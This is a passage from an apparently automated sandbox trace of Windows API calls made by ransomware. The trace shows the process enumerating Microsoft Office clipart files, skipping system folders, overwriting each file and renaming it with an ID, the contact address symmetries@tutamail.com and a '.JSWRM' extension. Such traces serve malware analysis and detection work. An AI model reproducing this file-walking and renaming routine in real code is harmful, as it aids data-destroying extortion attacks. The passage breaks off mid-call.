lpNumberOfBytesRead=0x345e89c*=0xbaa0, lpOverlapped=0x0) returned 1 [0074.642] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.642] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xbaa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xbaa0, lpOverlapped=0x0) returned 1 [0074.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.643] CloseHandle (hObject=0x460) returned 1 [0074.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0074.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0074.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0074.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0074.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0074.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0074.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.644] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD09194_.WMF", cAlternateFileName="")) returned 1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2=".") returned 1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="..") returned 1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="...") returned 1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="windows") returned -1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="recovery") returned -1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="perflogs") returned -1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="documents and settings") returned -1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="system volume information") returned -1 [0074.644] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="msocache") returned -1 [0074.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0074.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09194_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09194_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD09194_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0074.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0074.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09194_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09194_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD09194_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0074.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.645] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14540) returned 1 [0074.645] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x38c0) returned 0x24c1d0 [0074.646] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x38c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x38c0, lpOverlapped=0x0) returned 1 [0074.648] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.648] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x38c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x38c0, lpOverlapped=0x0) returned 1 [0074.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.648] CloseHandle (hObject=0x460) returned 1 [0074.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0074.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0074.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0074.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0074.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0074.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.648] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0074.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.649] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x504a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD09662_.WMF", cAlternateFileName="")) returned 1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2=".") returned 1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="..") returned 1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="...") returned 1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="windows") returned -1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="recovery") returned -1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="perflogs") returned -1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="documents and settings") returned -1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="system volume information") returned -1 [0074.649] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="msocache") returned -1 [0074.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0074.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09662_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09662_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD09662_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0074.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09662_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09662_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD09662_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.650] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20554) returned 1 [0074.650] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5040) returned 0x24c1d0 [0074.650] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x5040, lpOverlapped=0x0) returned 1 [0074.652] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.652] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x5040, lpOverlapped=0x0) returned 1 [0074.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.653] CloseHandle (hObject=0x460) returned 1 [0074.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0074.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0074.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0074.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0074.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0074.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.653] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0074.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.654] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f1e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD09664_.WMF", cAlternateFileName="")) returned 1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2=".") returned 1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="..") returned 1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="...") returned 1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="windows") returned -1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="recovery") returned -1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="perflogs") returned -1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="documents and settings") returned -1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="system volume information") returned -1 [0074.654] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="msocache") returned -1 [0074.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0074.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09664_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09664_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD09664_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0074.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0074.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09664_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD09664_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD09664_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0074.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.655] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7966) returned 1 [0074.655] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f10) returned 0x24c1d0 [0074.655] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1f10, lpOverlapped=0x0) returned 1 [0074.657] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.657] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1f10, lpOverlapped=0x0) returned 1 [0074.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.657] CloseHandle (hObject=0x460) returned 1 [0074.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0074.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 